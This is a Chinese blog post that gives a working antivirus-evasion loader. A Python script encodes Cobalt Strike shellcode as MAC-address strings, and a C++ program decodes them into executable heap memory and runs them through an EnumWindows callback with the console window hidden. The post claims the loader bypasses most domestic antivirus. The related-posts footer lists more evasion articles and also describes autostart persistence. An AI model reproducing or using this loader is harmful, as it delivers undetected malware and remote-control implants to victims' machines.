(记录向)Python_MAC加密&C++还原免杀(国内杀软基本通杀)

已于 2022-09-02 11:15:22 修改
阅读量1k 收藏 6
点赞数 2
分类专栏: 免杀 文章标签: macos
于 2022-09-02 11:04:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40989258/article/details/126658294
版权

1、首先生成CS的shellcode

2、 讲shellcode放入python脚本加密为MAC地址形式

def convertToMAC(shellcode):
    if len(shellcode) % 6 != 0:
        print("\n[*] length:", len(shellcode) + (6 - (len(shellcode) % 6)))
        addNullbyte = b"\x00" * (6 - (len(shellcode) % 6))
        shellcode += addNullbyte
    mac = []
    for i in range(0, len(shellcode), 6):
        tmp_mac = ""
        for j in shellcode[i:i + 6]:
            if len(hex(j).replace("0x", "")) == 1:
                tmp_mac = tmp_mac + "0" + hex(j).replace("0x", "").upper() + "-"
            else:
                tmp_mac = tmp_mac + hex(j).replace("0x", "").upper() + "-"
        mac.append(tmp_mac[:-1])
    return mac

if __name__ == '__main__':
    buf = b'''shellcode_here'''
    u = convertToMAC(buf)
    print(str(u).replace("'", "\""))

3、使用c++的RtlEthernetStringToAddressA函数(该函数将以太网 MAC 地址的字符串表示形式转换为以太网地址的二进制格式)将shellcode转换,最后使用回调执行shellcode。

#include<Windows.h>
#include <iostream>
#include<ip2string.h>
#pragma comment(lib,"Ntdll.lib")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // Windows 控制台程序 不弹 黑窗口


//将转换后的shellcode(shellcode->mac)
const char* mac_[] =
{
MAC_here
};

int main()
{
    HANDLE hc = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);//在进程的虚拟地址空间中保留空间
    void* SB = HeapAlloc(hc, 0, 0x100000);//申请内存
    DWORD_PTR hptr = (DWORD_PTR)SB;
    int elems = sizeof(mac_) / sizeof(mac_[0]);
    PCSTR Terminator = "";

    for (int i = 0; i < elems; i++) {

        if (RtlEthernetStringToAddressA(mac_[i], &Terminator, (DL_EUI48*)hptr) == STATUS_INVALID_PARAMETER)
        {
            printf("ERROR!");
            return 0;
        }
        hptr += 6;
    }
    EnumWindows((WNDENUMPROC)SB, 0);
}

4、生成免杀后的木马

5、执行绕过杀软上线

 

 

 

daxi0ng
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
[系统安全21]源码免杀C++壳的编写
17bdw的编程备份笔记
07-09 76
1、源码免杀 1.1 定位产生特征的源码 定位文件特征 1、根据MyCCL的特征码定位工具,定位出有特征的地址 2、根据VS的反汇编窗口,输入有特征的地址得到特征地址与源码的关系 3、插入MessageBox,然后定位出特征码离哪个MessageBox最近,并在附近以更高密度安插MessageBox,最终定位出产生特征码的源码位置。 定位行为特征 1、启发式...
python一种基于电脑mac地址的加密算法
summerriver1的博客
07-09 846
python一种基于电脑mac地址的加密算法
免杀对抗-C2远控篇&amp;C&amp;C++&amp;SC转换格式&amp;UUID标识&amp;MAC物理&amp;IPV4地址&amp;减少熵值(1)
最新发布
2401_83740129的博客
04-14 294
MAC地址也叫物理地址、硬件地址,由网络设备制造商生产时烧录在网卡的EPROM一种闪存芯片,通常可以通过程序擦写。IP地址与MAC地址在计算机里都是以二进制表示的,IP地址是32位的,而MAC地址则是48位(6个字节)的。IPv4是一种无连接的协议,操作在使用分组交换的链路层(如以太网)上。通用唯一识别码(UUID),是用于计算机体系中以识别信息数目的一个128位标识符,根据标准方法生成,不依赖中央机构的注册和分配,UUID具有唯一性。1、先用python代码将shellcode转换成uuid值。
Mac地址加密
weilai1917的专栏
08-17 3256
/** * 加密网卡MAC地址 * * @param mac 网卡MAC地址 * @return 加密后的网卡MAC地址 */ public static String encryptMac(String mac) { StringBuffer buffer = new StringBuffer(); String[] segments = mac.split(“-“
python 加密_python字符加密免杀
weixin_39564755的博客
12-07 346
目前传统的或网上以公开的免杀方式几乎都不免杀了(见光死),所以本次免杀方式也只是分享一下思路,如果后面不免杀了再改改就可以了这里使用的是python加载shellcode,原始的shellcode加载源码如下:importctypesshellcode=b"这里是生成的shellcode"#设置函数VirtualAlloc的返回类型为c_int64ctypes.windll.kerne...
获取MAC地址最有效方法作为软件加密时用到在不同系统平台下
weixin_34362875的博客
07-11 388
   最好不要用命令来获取信息 这里写出来只是通过一个比较而已 import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; import java.net.InetAddress; import java.net.NetworkInterface; imp...
2017212185 李新然 14 python_python_邮件加密系统_邮件加密_
10-03
在本项目中,李新然开发了一个基于Python的邮件加密系统,该系统具有图形用户界面,支持用户进行安全的加密邮件发送与接收解密。这是一个非常实用的安全通信工具,尤其对于那些需要保护通信隐私的用户而言。以下是...
Libsvm-2_6.rar_SVM 回归 Python_libsvm 2.6_python_svm c++ _分类
07-14
支持向量机初学者可以看看,用于可以用于C-SVM分类、?-SVM分类、?-SVM回归和?-SVM回归等问题
Python2.7_MACOS_64位&32位MacOS系统安装包
02-22
Python2.7_MACOS_64位&32位MacOS系统安装包Python2.7_MACOS_64位&32位MacOS系统安装包Python2.7_MacOS(Python2.7_MacOS系统32位+64位)
加密解密_加密_python_解密_
10-04
本项目聚焦于使用Python编程语言实现简单的加密和解密算法,这为我们提供了理解和应用基础加密技术的基础。 首先,让我们理解加密基本概念。加密是将明文(可读信息)转换为密文(不可读信息)的过程,目的是保护...
通过Python实现Payload分离免杀过程详解
09-16
主要介绍了通过Python实现Payload分离免杀过程详解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
python实现5种加密
qq_39483957的博客
05-20 422
import hashlib import base64 import hmac #MD5 def md_5(): m = hashlib.md5() #生成一个md5加密对象 str = "明文" m.update(str.encode("utf8")) #指定要加密的字符串的字符编码 print(m.hexdigest()) md_5() #base64 def base_64(): str = "明文".encode(enc
c++ 创建文件夹_教你一招!在Mac上创建加密的文件磁盘
weixin_39629617的博客
10-31 192
你是否会遇到这样的情况?有一些重要文件放在电脑里,然而家里的熊孩子、随时可能借出电脑等情况,都令这些不想让人看见的文件有暴露的危险。不论是工作上的要求,还是个人隐私,加密自己的重要文件都是非常重要的事情。这个时候,我们就可以创建一个加密的文件夹来放置这些重要文件。除了可以下载一些加密用的软件,下面就让小编来告诉大家怎么通过Mac自带的程序实现这个功能吧。创建加密文件夹1.打开启动台,在“...
【黑客免杀攻防】读书笔记15 - 源码免杀C++壳的编写
weixin_30715523的博客
07-09 497
1、源码免杀 1.1 定位产生特征的源码 定位文件特征 1、根据MyCCL的特征码定位工具,定位出有特征的地址 2、根据VS的反汇编窗口,输入有特征的地址得到特征地址与源码的关系 3、插入MessageBox,然后定位出特征码离哪个MessageBox最近,并在附近以更高密度安插MessageBox,最终定位出产生特征码的源码位置。 定位行为特征 1、启发式检测方法:特征...
如何利用十行C++代码,绕过杀毒软件实现免杀
03-17 2765
我相信大部分的读者都会同意这个观点,绕过大部分杀毒软件的基本方法都很平常没什么特殊的。然而,我也偶尔会遇到一些人仅仅依靠工具生成二进制文件,这些文件很容易被杀毒软件通过指纹标记出来。本文主要是为这些人所准备的。 下面是小编整理好的一套C/C++资料,加小编C/C++编程学习群825414254,获取系统性学习C/C++的学习资料 在我们开始接触这段小巧的 C++ 代码前,我想先介绍一个可以非常...
论用C++做壳
xuplus的专栏
04-10 1117
 1. 加壳语言.现在的壳多数都是汇编的.但本人汇编水平一般,连olly都使不好,所以只能放弃汇编.我见过delphi和VB做的壳.VB做的那个真的不错,有机会上传到这里,让大家看看.本人是C/C++的忠实用户,而且C和汇编很接近了,所以选择了C++做壳.2. 加壳原理加壳原理我想大家都很清楚,无非是wrap oep, remove reloc, 然后在最后价格stub.修改oep.话说起来轻悄,
cs免杀之基于混淆和加壳
weixin_54855337的博客
04-14 4047
写在前面 最近也是没什么状态以及被身边人,事,物所受影响,环境对自己的影响也是非常大,但是随着时间的变化一切也都会改变,离群所居者,不是神灵,就是野兽,所以说需要脱离这种状态,找到自己人生中明确的方向,不能一天天的萎靡不正 简单进行混淆和加壳 其实早在去年11月左右就玩过一点cs,但是那个时候还是懵懵懂懂,虽然现在也是一样的 打开服务端,192.168.4.191为自己的ip也可以127.0.0.1,然后123123为连接密码 使用java或者bat再或者sh打开都可以,然后就是双..
c语言免杀程序源码,Window下基于C/C++源码免杀理论及思路(新手篇)
weixin_30427953的博客
05-18 832
作者:冷锋(LengF)[BHST]博客:www.81sec.com时间:2011-5-220x00概述最近搞一个国外的网站,对方是用的赛门铁克的诺顿杀毒软件,而内网又只对外开放了80端口,于是就想着传个端口转发或者端口复用的工具上去,可是一上传就没了。既然已经提权了,又不想轻易放弃这台服务器。于是就想着怎么办了。自己对非源码的免杀不熟悉,于是就想到自己手头有类似于LCX的工具c源...
利用Python执行ShellCode
2201_75774378的博客
05-05 585
D:\网安\sike\ShellCode_Loader>Shellcode_encryption.exe shellcode_xor.c。将生成的密文ShellCode 填至 ShellCode_Loader.py 里的 Data = ‘密文Shellcode’ 处。运行:Shellcode_encryption.exe payload.c 对ShellCode代码进行加密处理。使用Python 64位版加载器。生成x64位的ShellCode。使用64位版Python加载器。Python加载器实现免杀
python自启动 绕过360_记录一次绕过杀软的过程
06-10
首先,需要注意的是,绕过杀软是一种不道德的行为,同时也是违法的。因此,我们不鼓励或支持这种行为。 其次,关于Python自启动,一般有两种方法: 1. 将Python脚本添加到系统的启动项中。这样,每次开机启动时,系统会自动运行这个脚本。具体步骤如下: - 打开“运行”窗口,输入“shell:startup”,打开启动文件夹。 - 右键点击文件夹中的空白处,选择“新建”->“快捷方式”。 - 在“快捷方式”的目标栏中输入“python.exe 脚本路径”,如“C:\Python27\python.exe D:\test.py”。 - 点击“下一步”,输入一个名称,如“test”,点击“完成”即可。 2. 使用Windows任务计划程序。这样,可以设置脚本在指定的时间自动运行。具体步骤如下: - 打开“控制面板”->“管理工具”->“任务计划程序”。 - 在任务计划程序中,右键点击“任务计划程序库”,选择“创建任务”。 - 在“常规”选项卡中,输入一个名称和描述,选择“不管用户是否登录都要运行”,勾选“使用最高权限运行”。 - 在“触发器”选项卡中,选择“新建”,设置计划的触发条件,如每天、每周等。 - 在“操作”选项卡中,选择“新建”,设置操作为“启动程序”,输入“python.exe 脚本路径”。 - 点击“确定”保存任务。 对于绕过杀软的过程,一般有以下几种方法: 1. 使用FUD(Fully Undetectable)技术,将病毒代码加密或混淆,使其难以被杀软检测到。 2. 使用虚拟机或沙箱环境,在其中运行病毒代码,以避免被杀软检测。 3. 修改病毒代码,使其不再具有病毒行为,从而不被杀软检测到。 4. 手动编写病毒代码,使用未被杀软识别的技术和方法。 需要注意的是,这些方法都存在风险和不道德性质,因此不应该轻易尝试。同时,杀软的主要目的是保护用户安全,因此绕过杀软的行为也可能会对用户造成风险和危害。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值